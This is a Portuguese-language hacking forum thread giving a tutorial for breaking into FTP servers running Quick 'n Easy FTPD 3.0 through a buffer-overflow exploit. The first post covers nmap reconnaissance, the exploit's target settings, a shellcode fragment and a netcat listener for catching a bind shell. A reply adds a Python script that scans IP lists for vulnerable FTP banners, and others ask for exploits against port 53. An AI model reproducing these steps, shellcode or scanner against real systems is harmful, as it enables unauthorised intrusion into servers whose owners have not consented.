Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invadindo FTP com exploit

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Invadindo FTP com exploit

    Por Twi John

    Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesa técnica para invadir Telnet, SSH entre outros.

    A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação.
    Estarei já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo.

    Primeiro você deve identificar o serviço, versão, OS, entre outros. Você pode usar o nmap para isso usando a seguinte linha que gosto de usar:

    nmap -v -sV -sC -O host

    Para nosso caso, será encontrado um host com Quick 'n Easy FTPD 3.0, será necessario você ter acesso a algum usuario ou ftp anonimo, usando o -sC você saberá se o servidor tem acesso anonimo.
    Veja o sistema operaciona.
    Feito isso agora vamos usar o exploit em python.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Aqui você deve configurar ele:

    host = "127.0.0.1" // O Host que será explorado
    port = 21 // A porta , por padrão 21
    user = "h07" // O usuario, caso tenha acesso anonimo coloque "ftp"
    password = "open" // Mesma coisa do usuario

    Shellcode: No caso desse exploit será aberto a calculadora do windows, mais você pode estar alterando ele, pode encontrar shellcodes no site do metasploit ou então fazendo você mesmo.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    shellcode = (
    #bad chars: 0x00 0x0a 0x0d 0x5c 0x2f
    #reconstruction PEB block
    #mov dword edx, 0x7FFDF020 ;EDX <-- RtlEnterCriticalSection pointer
    #mov dword [edx], 0x77F8AA4C ;RtlEnterCriticalSection pointer <-- original value
    #...

    "\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
    "\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\ x53\ xB9"
    "\xad\xaa\x01\x78" #Address of system() function (2000 SP0 polish)
    "\xFF\xD1\xEB\xF7")

    Pronto, agora ele irá enviar "A" 267, para ocorrer o buffer overflow colocando a shellcode.

    Caso você tenha escolhido uma shellcode de bind, antes de explorar você abre o netcat e digita : nc -vv -l -p (porta de bind) -n

    Agora usa o exploit e você estará conectado na shell do sistema.

    Obrigado, espero que tenham gostado. Me corrijam qualquer coisa.
    Last edited by 5ubzer0; 08-12-2009, 12:59.

  • Font Size
    #2
    muito bom , belo topico ..
    Nao Participa ainda ?
    * Comunidade Elite Defacer


    Elite Defacer
    Hackeralp - 5ubZer0 - $cr34m()

    Comment


    • Font Size
      #3
      muinto bom twi heheh
      sigpic

      skype e email c4p3lob8@hotmail.com

      Comment


      • Font Size
        #4
        Valeuu pela dica twi \O
        ~# Criado pela [IN]Segurança #~

        Comment


        • Font Size
          #5
          bem antigao mais vlw
          -------------------------------------------------------------------------------------------






          Comment


          • Font Size
            #6
            O exploit é antigo, mais o metodo é muito usado hoje em dia.
            Eu num iri usar um exploit novinho né !? hehe.

            Comment


            • Font Size
              #7
              Criei um exploit para ajudar ai:
              Você tem que ter uma "lista.txt" com todos os IP's que você deseja scaniar.
              Onde ta "Microsoft FTP" você altera para o nome que você deseja procurar no caso Quick 'n Easy FTPD 3.0, mais não sei se é assim que é escrito no banner então não coloquei.

              Use nmap para encontrar hosts:

              nmap -sP host/24
              nmap -v -iR 1000 -p21

              Nisso você decide como vai fazer o scan.

              Agora o exploit:


              #!/usr/bin/python
              #Coded by Twi John


              from ftplib import FTP
              import re

              print """
              ______ _ ______
              | ___| | | | ___
              | |_ ___ _ _ _ __ __| | | |_/ / __ _ _ __ _ __ ___ _ __
              | _/ _ | | | | '_ / _` | | ___ / _` | '_ | '_ / _ '__|
              | || (_) | |_| | | | | (_| | | |_/ / (_| | | | | | | | __/ |
              _| ___/ __,_|_| |_|__,_| ____/ __,_|_| |_|_| |_|___|_|


              ______ ___________ _____
              | ___|_ _| ___ / ___|
              | |_ | | | |_/ / `--. ___ __ _ _ __ _ __ ___ _ __
              | _| | | | __/ `--. / __/ _` | '_ | '_ / _ '__|
              | | | | | | /__/ / (_| (_| | | | | | | | __/ |
              _| _/ _| ____/ _____,_|_| |_|_| |_|___|_|

              Coded By Twi John

              """

              print ("Servers Found:")
              lista = open("list.txt","r")
              for line in lista.readlines():
              lst = line
              ftp = FTP(lst)
              banner = ftp.getwelcome()
              if re.search("Microsoft FTP",banner):
              print(lst)

              Comment


              • Font Size
                #8
                lol Twi viva o twi !! e a Fail Shel
                sigpic

                Campanha Anti-Ripper: Você não gosta de rippers ("ladrões de coteúdo")? Use essa userbar e faça o seu protesto.

                Comment


                • Font Size
                  #9
                  poderia rola uma video aula de como utilizar ese exploit


                  mateiriasi exclusivos

                  Comment


                  • Font Size
                    #10
                    Meus amigos, as vezes você encontra ouro no lixo. !Viva la Old School Hacking!

                    Muito Bom.

                    Comment


                    • Font Size
                      #11
                      opaaa rox hein mano.....ótima ideia, por ftp...xD =D
                      Não é invasão quando se tem a senha!!!

                      Comment


                      • Font Size
                        #12
                        Alguem manja site com bastante alternativas de exploit ?? to montando um kit hehe to precisando de algum para explorar falhas na porta 53... sei que essa pergunta nao tem muito haver com o topico.. mas beleza ;D

                        Comment


                        • Font Size
                          #13
                          podia faze uma video aula
                          nao entendi muita coisa, ou se alguem me manda um tutorial sobre invasão po ftp ou como montar essas shellcodes, agradeço.

                          Comment


                          • Font Size
                            #14
                            Alguem manja site com bastante alternativas de exploit ?? to montando um kit hehe to precisando de algum para explorar falhas na porta 53... sei que essa pergunta nao tem muito haver com o topico.. mas beleza ;D
                            Ta estragando o topico meu amigo... brinks..

                            ai:

                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                            podia faze uma video aula
                            nao entendi muita coisa, ou se alguem me manda um tutorial sobre invasão po ftp ou como montar essas shellcodes, agradeço.
                            Video aula seria meio dificil porque no meu pc num da pra faze.
                            A dica pra esse topico é aprender C ou python como nesse caso e assembly, depois abrender buffer overflow.. assim facilita bastante

                            Comment


                            • Font Size
                              #15
                              Para responder no fórum Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... que é isso aqui Amigo o Fórum do guia do hacker estão com esta portas todas aqui abertas 80, 25, 21, 443, 110, 143, 53, 8443, 995, 993, 11, 465 e porque estão todas estas portas abertas em amigo?
                              SEJA ÚNICO E NÃO IMITE OS OUTROS E NEM COLOQUE PARA TRÁS QUEM ESTA NO COMEÇO AGORA.

                              USEM SEUS CONHECIMENTOS PARA O BEM E NÃO PARA O MAL AMIGOS PORQUE O MAL NÃO LEVA A NADA E O BEM SEMPRE GANHAREMOS COISAS MELHORES.


                              Comment

                              X
                              Working...
                              X